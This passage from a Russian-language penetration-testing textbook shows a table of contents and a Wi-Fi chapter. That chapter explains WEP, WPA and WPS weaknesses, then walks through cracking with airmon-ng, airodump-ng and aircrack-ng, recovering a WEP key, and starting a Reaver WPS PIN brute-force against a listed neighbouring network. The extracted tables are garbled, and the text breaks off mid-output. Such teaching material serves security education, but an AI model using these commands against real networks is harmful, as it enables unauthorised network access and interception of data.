- •Благодарности
- •Список использованных сокращений
- •От издательства
- •Введение
- •Глава 1. Начало
- •Как провести аудит законно?
- •Методология взлома
- •Резюме
- •Глава 2. Получение информации из открытых источников
- •Введение
- •Что искать?
- •Использование Google для сбора информации
- •Ограничение поиска одним сайтом
- •Поиск файлов определенного типа
- •Поиск определенных частей сайта
- •Google Hacking
- •Поиск информации о людях
- •Архивные данные
- •Netcraft
- •Получение информации о домене
- •Автоматизация процесса
- •FOCA
- •Сбор базы данных адресов e-mail
- •recon-ng
- •Упорядочить информацию
- •Резюме
- •Глава 3. Получение информации от сетевых сервисов
- •Введение
- •Сканирование портов
- •Определение активных хостов
- •UDP-сканирование
- •NMAP
- •Получение информации от DNS-сервера
- •Типы записей
- •Взаимодействие с DNS-сервером
- •MX-записи
- •NS-запросы
- •Перебор имен
- •Перебор обратных записей
- •Передача зоны DNS
- •Получение информации с использованием SNMP
- •Получение информации с использованием NetBIOS
- •Null session
- •Работа с электронной почтой
- •Анализ баннеров
- •Получение информации от NTP-сервера
- •Поиск уязвимостей
- •Резюме
- •Глава 4. Атаки на веб-приложения
- •Знакомство с сookie
- •Межсайтовый скриптинг (XSS)
- •Включение локальных или удаленных файлов
- •SQL-инъекции
- •Резюме
- •Глава 5. Социальная инженерия
- •На кого обратить внимание?
- •Фазы атаки
- •Манипулирование людьми
- •Типы атак
- •Social-Engineer Toolkit
- •Резюме
- •Глава 6. Получаем пароли
- •Основные методы
- •Работа со списками паролей
- •Онлайн-атаки
- •Радужные таблицы
- •Резюме
- •Глава 7. Беспроводные сети
- •Краткий обзор Wi-Fi
- •Bluetooth
- •Резюме
- •Глава 8. Перехват информации
- •Пассивный перехват трафика
- •Активный перехват
- •Резюме
- •Глава 9. Обход систем безопасности
- •Системы обнаружения атак
- •Брандмауэры
- •Приманки
- •Резюме
- •Глава 10. Вредоносные программы
- •Вирусы
- •Черви
- •Шпионы
- •Рекламное ПО
- •Троянские кони
- •Практическая часть
- •Резюме
- •Глава 11. Metasploit Framework
- •Интерфейс
- •Вспомогательные модули
- •Полезная нагрузка
- •Практические навыки
- •Резюме
- •Глава 12. Передача файлов
- •TFTP
- •Загрузка файлов с использованием скриптов
- •Резюме
- •Глава 13. Превышение привилегий
- •Локальное повышение прав в Linux
- •Локальное повышение прав в Windows
- •Повышение привилегий в случае некорректной конфигурации прав доступа
- •Резюме
- •Глава 14. Перенаправление портов и туннелирование
- •Перенаправление портов
- •SSH-туннелирование
- •proxychains
- •Резюме
- •Глава 15. Переполнение буфера
- •Атаки, направленные на переполнение буфера
- •Введение
- •Что такое переполнение буфера?
- •Программы, библиотеки и бинарные файлы
- •Угрозы
- •Основы компьютерной архитектуры
- •Организация памяти
- •Разбиение стека (Smashing the stack)
- •Перезапись указателя фрейма
- •Атака возврата в библиотеку
- •Переполнение динамической области памяти
- •Пример нахождения уязвимости переполнения буфера
- •Резюме
- •Глава 16. Собирая все воедино
- •Стандарт выполнения тестов на проникновение
- •Подготовительная фаза
- •Договор о проведении работ
- •Получение разрешения
- •Сбор данных
- •Анализ уязвимостей
- •Моделирование
- •Эксплуатация уязвимостей
- •Постэксплуатационный этап
- •Отчет
- •Зачистка
- •Введение
- •Глава 17. Личный пример
- •Глава 18. Бумажная работа
- •Политика безопасности
- •Стандарты
- •Процедуры
- •Инструкции
- •Техническая документация
- •Глава 19. Обучение и тренировки
- •Тренировки
- •Глава 20. Защита от утечки информации
- •Глава 21. Брандмауэры
- •Глава 22. Системы обнаружения вторжения (IDS)
- •Глава 23. Виртуальные защищенные сети (VPN)
- •Компоненты виртуальной частной сети
- •Безопасность VPN
- •Создание VPN из компонентов с открытым исходным кодом
- •Заключение
7 Беспроводные сети
С момента появления беспроводных сетей прошло относительно немного времени, но они сразу же завоевали огромную популярность, и с каждым днем сфера их применения только растет. Желание пользователей становиться более мобильными, не быть привязанными к определенному рабочему месту, а также требования современных бизнес-процессов только усиливают их распространение. Беспроводные сети расширяют границы и позволяют пользователям подключаться к различным ресурсам в таких местах, где раньше этой возможности не было даже в теории.
Мы рассмотрим два вида беспроводных сетей — Wi-Fi и Bluetooh. Хотя они и отличаются, однако с точки зрения информационной безопасности подвержены одинаковым рискам. В современном мире Bluetooh используется для связи друг с другом мобильных телефонов, планшетов, беспроводных клавиатур и многих других устройств. Достаточно только представить, сколько различной информации хранят пользователи на своих мобильных устройствах, чтобы понять, насколько велики риски, связанные с утечкой таких данных.
Краткий обзор Wi-Fi
Wi-Fi — это тип беспроводной передачи данных, который описан в стандарте IEEE 802.11. Эта технология передачи данных используется практически во всех устройствах, от мобильных телефонов до персональных компьютеров и игровых консолей. Благодаря этой технологии пользователи могут подключать различные устройства к глобальной или локальной сети.
Для связи устройства с глобальной сетью необходима так называемая точка доступа. Существует два основных типа точек доступа:
1.На основе аппаратных средств. Обычно это отдельно стоящий беспроводной роутер, открытый для подключения пользователей.
2.На основе программных средств. Также открыт для подключения пользователей по беспроводной сети, однако может включать в себя множество точек доступа.
Краткий обзор Wi-Fi 109
Это позволяет пользователям передвигаться от зоны действия одной точки
кзоне действия другой без потери сигнала и необходимости переподключения
ксети.
Беспроводные сети также используются для связи локальных сетей. Например, когда два офиса организации разделены регионально, вместо того, чтобы использовать проводные магистрали, можно связать их, используя беспроводные технологии типа LAN-to-LAN.
Существует несколько стандартов передачи данных, которые отличаются максимальной скоростью передачи информации, частотой и радиусом действия. Следует заметить, что максимальная скорость и радиус достижимы лишь в идеальных условиях, которые в реальной жизни практически не встречаются.
Протокол |
Частота, |
Дальность, |
Максимальная скорость |
|
ГГц |
м |
передачи данных, |
|
|
|
Мб/с |
|
|
|
|
Bluetooth |
2,4 |
10 |
1–3 |
|
|
|
|
802.11a |
5 |
22 |
54 |
|
|
|
|
802.11b |
2,4 |
45 |
11 |
|
|
|
|
802.11g |
2,4 |
45 |
54 |
|
|
|
|
802.11n |
2,4 или 5 |
30 |
600 (теоретически) |
|
|
|
|
802.11ac |
5 |
48 280 |
1,3 Гбит/с |
|
|
|
|
Ввиду того что в определенном месте устройство пользователя может принимать сигнал от различных точек доступа, их необходимо идентифицировать. Для этого для каждой сети конфигурируют идентификатор (SSID). Если он отрытый, то каждый пользователь может его увидеть, но это не значит, что у него будет возможность подключиться к такой сети. Однако SSID может быть скрытым, и в этом случае пользователь не сможет его увидеть, даже если будет находиться в зоне действия такой сети. Для подключения к такой сети ему придется ввести SSID вручную.
Итак, мы плавно перемещаемся к вопросу аутентификации. Есть два основных метода. Первый, и самый простой, — это открытая сеть. Такие чаще всего устанавливаются в кафе, ресторанах или неопытными пользователями у себя дома. При подключении к такой сети устройство клиента посылает запрос точке доступа, она сравнивает SSID и, в случае его совпадения с ее собственным, отправляет клиенту подтверждение, тем самым разрешая подключение.
Второй тип основывается на общедоступных ключах. В этом случае клиент посылает точке запрос на аутентификацию, а точка отправляет ему специальный пакет. Клиент, используя заранее сконфигурированный общедоступный ключ, шифрует пакет и отправляет его назад. Если точка доступа сможет его расшифровать, используя тот же ключ, то клиент получает разрешение на доступ в сеть.
110 Глава 7 • Беспроводные сети
Последнее, что нам осталось рассмотреть, прежде чем мы перейдем к вопросам безопасности, — это шифрование. В отличие от проводной сети, где мы знаем точное место прохождения кабелей и можем контролировать доступ к ним, в случае с беспроводными сетями эта задача становится достаточно сложной. Даже если доступ в помещения организации будет строго ограничен, поймать сигнал беспроводной сети можно за пределами зоны контроля, оставаясь при этом совершенно незамеченным и получить доступ ко всем передаваемым данным.
Для того чтобы уменьшить риски, связанные с возможным перехватом данных, вся информация шифруется. Рассмотрим ближе основные методы шифрования данных:
1.WEP — самый старый и уязвимый из протоколов. Он был внедрен на заре беспроводных сетей и очень скоро был скомпрометирован. Однако до сих пор все роутеры поддерживают его, и можно найти сети, в которых он используется по умолчанию.
2.WPA — создан на основе WEP. В этом протоколе были исправлены многие недочеты его предшественника. Использует усовершенствованную систему шифрования и аутентификации.
3.WPA2 — создан на основе WPA и впоследствии должен заменить его. В нем используется шифрование AES и реализована поддержка CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol).
WEP
Несмотря на то что WEP является устаревшим стандартом, он все еще используется в некоторых системах, поэтому остановимся на нем подробнее.
Впервые этот протокол был представлен вместе со стандартом 802.11b и должен был обеспечить такой же уровень безопасности, как и в проводных сетях. Он использует потоковый шифр RC4.
Основными задачами данного протокола были: предотвращение перехвата данных, обеспечение проверки целостности данных и использования общедоступного ключа для шифрования данных перед передачей, а также конфиденциальности и эффективности. Но, к сожалению, со своими задачами он справился недостаточно хорошо.
Разберемся с уязвимостями данного протокола:
использование CRC32 для проверки целостности данных, что позволяет незаметно манипулировать пакетами с данными;
использование векторов инициализации длиной всего в 24 бита — это означает, что при интенсивной нагрузке на сеть их все можно собрать примерно за 5 часов;
WEP 111
ключи могут быть обнаружены при анализе пакетов;подвержен атакам типа «отказ в обслуживании».
Теперь рассмотрим сам процесс получения ключей. Основной частью взлома является сбор векторов инициализации, что осуществляется при помощи перехвата пакетов. Собрав нужное их количество, можно будет приступить к анализу. Есть один важный принцип: чем больше будет собрано пакетов, тем проще их проанализировать. Однако тут есть одна проблема — время. Сбор пакетов может занять достаточное количество времени, особенно если сеть не используется активно. Одним из приемов, применяющихся для обхода этого ограничения, является отправка атакующим специально сформированных пакетов, что создает нужное количество трафика.
Рассмотрим взлом такой сети с использованием инструментов, доступных в Kali Linux.
Прежде чем начать, необходимо учесть, что стандартный драйвер для Wi-Fi- адаптера не позволит собирать нужные данные. Для этого нужен модифицированный драйвер. К счастью, для многих адаптеров они существуют, входят в состав Kali Linux и не требуют отдельной установки. Однако можно столкнуться с ситуацией, когда сниффинг на выбранном адаптере будет невозможен.
Приступим. Вначале определим, какие Wi-Fi-адаптеры нам доступны, выберем среди них подходящий и запустим на нем мониторинг. После этого airmon-ng создаст новый интерфейс, с которым мы и будем работать дальше.
root@kali:~# airmon-ng |
|
||
PHY |
Interface |
Driver |
Chipset |
phy0 |
wlan0 |
iwl3945 |
Intel Corporation PRO/Wireless 3945ABG [Golan] |
(rev 02) |
|
|
|
root@kali:~# airmon-ng start wlan0 |
|
||
Found |
2 processes |
that could cause trouble. |
|
If airodump-ng, aireplay-ng or airtun-ng stops working after |
|||
a short period of |
time, you may want to run 'airmon-ng check kill' |
||
PID |
Name |
|
|
1125 |
NetworkManager |
|
|
1226 |
wpa_supplicant |
|
|
PHY |
Interface |
Driver |
Chipset |
phy0 |
wlan0 |
iwl3945 |
Intel Corporation PRO/Wireless 3945ABG [Golan] |
(rev 02)
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon) (mac80211 station mode vif disabled for [phy0]wlan0)
112 Глава 7 • Беспроводные сети
Теперь посмотрим на список доступных сетей и выберем нужную — ту, которая поддерживает WEP.
root@kali:~# airodump-ng wlan0mon
CH 10 ][ Elapsed: 36 s ][ 2016-11-08 14:15
BSSID |
PWR |
Beacons |
#Data, #/s |
CH |
MB |
ENC |
CIPHER |
AUTH ESSID |
||
00:1D:7E:E0:47:9C |
-34 |
174 |
2 |
0 |
5 |
54 . WEP |
WEP |
|
Come And |
|
Get It |
|
|
|
|
|
|
|
|
|
|
F8:1A:67:CC:C6:E6 |
-55 |
171 |
13 |
0 |
10 |
54e. |
WPA2 CCMP |
PSK |
503v |
|
28:28:5D:96:52:C0 |
-50 |
147 |
1 |
0 |
10 |
54e |
WPA2 CCMP |
PSK |
Keenet |
|
ic-6040 |
|
|
|
|
|
|
|
|
|
|
14:CC:20:0E:87:64 |
-66 |
134 |
1 |
0 |
2 |
54e. |
WPA2 CCMP |
PSK |
buriki |
|
A0:21:B7:6F:1C:3C |
-63 |
45 |
6 |
0 |
7 |
54e |
WPA2 CCMP |
PSK |
Genisys |
|
D4:BF:7F:07:04:88 |
-58 |
164 |
7 |
0 |
9 |
54e |
WPA2 CCMP |
PSK |
Upvel_04 |
|
8b |
|
|
|
|
|
|
|
|
|
|
C0:4A:00:86:49:18 |
-69 |
145 |
671 |
0 |
11 |
54e. |
WPA2 TKIP |
PSK |
Savior |
|
B8:A3:86:19:E0:98 |
-67 |
68 |
0 |
0 |
3 |
54e |
WPA2 CCMP |
PSK |
603B |
Соберем необходимое количество пакетов (хотя бы 15 000) при помощи airodumpng и проанализируем их.
root@kali:~# airodump-ng -w /root/wifi_dump -c 5 --bssid 00:1D:7E:E0:47:9C wlan0mon
CH 5 ][ Elapsed: 9 mins ][ 2016-11-08 14:29
BSSID |
|
PWR RXQ Beacons |
#Data, #/s |
CH |
MB |
ENC |
CIPHER AUTH ESSID |
||||
00:1D:7E:E0:47:9C |
-23 100 |
5192 |
49680 |
164 |
5 |
54 . WEP |
WEP |
Come |
|||
And Get It |
|
|
|
|
|
|
|
|
|
|
|
BSSID |
|
STATION |
|
PWR |
Rate |
Lost |
Frames |
Probe |
|||
00:1D:7E:E0:47:9C |
8C:70:5A:2C:40:B8 |
-35 |
54 — 6 |
|
125 |
50185 |
|
||||
root@kali:~# aircrack-ng |
/root/wifi_dump-01.cap |
|
|
|
|
|
|||||
Opening /root/wifi_dump-01.cap |
|
|
|
|
|
|
|
|
|||
Read 121245 packets. |
|
|
|
|
|
|
|
|
|
|
|
# |
BSSID |
|
ESSID |
|
|
|
Encryption |
|
|
|
|
1 |
00:1D:7E:E0:47:9C |
Come And Get It |
|
WEP (49680 IVs) |
|
|
|||||
Choosing first network as target. |
|
|
|
|
|
|
|
||||
Opening /root/wifi_dump-01.cap |
|
|
|
|
|
|
|
|
|||
Attack will be restarted |
every 5000 captured ivs. |
|
|
|
|
|
|||||
Starting PTW attack with |
49680 |
ivs. |
|
|
|
|
|
|
|
||
|
|
|
KEY FOUND! [ 89:3A:9F:36:8A ] |
|
|
|
|
||||
|
Decrypted correctly: 100% |
|
|
|
|
|
|
|
|
WPA 113
WPA
В свое время WPA сменила столь ненадежный WEP. Основными преимуществами стали надежность, производительность, контроль и совместимость.
Однако и у этого протокола есть свои слабые стороны:простые ключи шифрования, задаваемые пользователем;возможность подмены пакетов;
проблемы с протоколом аутентификации MS-CHAP v2.
Подход к взлому сетей, защищенных WPA, кардинально другой, однако и в этом случае доступен хороший инструмент, предназначенный специально для таких целей, — Reaver (входит в состав Kali Linux). Основной принцип работы Reaver — использование уязвимостей в роутерах для сбора информации о WPA.
Когда протокол WPA только появился, у многих пользователей возникли трудности с конфигурацией настроек сети. Для облегчения данной задачи была создана новая технология, известная как безопасная настройка Wi-Fi (Wi-Fi Protected Setup), которая до сих пор поддерживается огромным количеством устройств.
Эта технология должна была облегчить жизнь пользователей. Достаточно было нажать кнопку на роутере, и нужное устройство могло подключиться к сети практически сразу же, без ввода дополнительных данных. Первая проблема заключается в том, что у любого, у кого есть физический доступ к роутеру, автоматически появляется возможность несанкционированного доступа в сеть. Вторая проблема — использование ПИН-кодов.
ПИН-код на роутере похож на ПИН-код телефона или любого другого устройства. Он также состоит только из цифр, к тому же их всего восемь. Когда роутер получает восьмизначный код, он сначала проверяет только первые четыре цифры, и если они верны, то затем и вторые четыре. Это создает большую проблему в сфере безопасности, ведь для преодоления этого барьера надо перебрать всего 11 000 комбинаций, а роутер, в отличие от телефона или банкомата, не заблокирует атакующего после трех неверных попыток.
Посмотрим, как будет выглядеть на практике взлом WPA с использованием Reaver под Kali Linux.
Первые шаги аналогичны. Посмотрим доступные адаптеры и подключим нужный. Далее необходимо выбрать адаптер, поддерживающий WPS.
root@kali:~# airmon-ng |
|
||
PHY |
Interface |
Driver |
Chipset |
phy0 |
wlan0 |
iwl3945 |
Intel Corporation PRO/Wireless 3945ABG [Golan] |
(rev 02)
root@kali:~# airmon-ng start wlan0
114 Глава 7 • Беспроводные сети
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want |
to run 'airmon-ng check kill' |
||||
PID Name |
|
|
|
|
|
1125 NetworkManager |
|
|
|
||
1226 wpa_supplicant |
|
|
|
||
PHY |
Interface |
Driver |
|
|
Chipset |
phy0 |
wlan0 |
iwl3945 |
|
|
Intel Corporation PRO/Wireless 3945ABG [Golan] |
(rev 02) |
|
|
|
|
|
|
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon) |
||||
|
(mac80211 station mode vif disabled for [phy0]wlan0) |
||||
root@kali:~# wash -i wlan0mon --ignore-fcs |
|||||
Wash v1.5.2 WiFi Protected |
Setup Scan Tool |
||||
Copyright (c) 2011, Tactical Network |
Solutions, Craig Heffner <cheffner@tacnetsol. |
||||
com> |
|
|
|
|
|
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 |
|||||
BSSID |
|
Channel |
RSSI |
WPS |
Version WPS Locked ESSID |
-------------------------------------------------------------- |
|||||
28:28:5D:ED:E7:88 |
1 |
-69 |
1.0 |
No Keenetic-5706 |
|
AC:9E:17:8C:9D:4C |
1 |
-91 |
1.0 |
No ASUS |
|
30:B5:C2:BF:A4:12 |
2 |
-71 |
1.0 |
No kakaha |
|
E8:DE:27:D7:86:AE |
2 |
-86 |
1.0 |
No b504g |
|
00:18:E7:FE:C4:AC |
3 |
-89 |
1.0 |
No 804v |
|
A0:21:B7:B0:15:3E |
3 |
-87 |
1.0 |
No Victoria |
|
C4:3D:C7:85:7E:AE |
5 |
-70 |
1.0 |
No Exhibitionist |
Выберем нужную сеть — с технической точки зрения все они подходят, — а затем подберем ПИН.
root@kali:~# reaver -i wlan0mon -b 30:B5:C2:BF:A4:12
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol. com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
[+]Waiting for beacon from 30:B5:C2:BF:A4:12
[+]Associated with 30:B5:C2:BF:A4:12 (ESSID: kakaha)
[+]Starting Cracking Session. Pin count: 0, Max pin attempts: 11000 [P] E-Nonce: 9c:28:96:b2:4c:54:1f:9d:a9:b6:c4:ef:a0:de:83:72
[P] PKE: 59:cc:01:4a:e7:0f:03:52:3c:71:40:80:92:7f:37:83:de:41:9a:d9:8c:df:b0:96:cb :dd:3b:7d:2e:9e:28:12:0a:12:81:52:82:1b:91:24:8e:67:9a:02:5e:05:01:24:a0:ca:de:cb:b 2:d2:59:2c:69:4a:11:a0:0c:6b:ce:45:78:d8:43:2d:bc:e1:78:a6:54:8c:a8:c2:3f:38:10:41: b9:8c:5e:ea:74:42:a7:af:d8:21:b5:e1:39:54:1b:d5:63:b0:7f:2f:d3:a6:f0:99:61:77:c0:af :7a:95:cc:1c:2b:d6:51:94:30:93:28:86:39:a0:c3:bc:b8:47:85:1c:39:46:a6:63:23:03:91:4 d:ca:c0:72:32:f9:a3:46:39:7d:57:57:97:7a:73:ec:c5:ce:8a:0e:aa:f0:b9:e3:02:76:ca:42: 86:38:c4:01:a8:25:ba:db:93:c1:2c:1c:41:c7:99:48:2d:af:78:dd:73:e8:d7:ec:e4:c8:a1:8b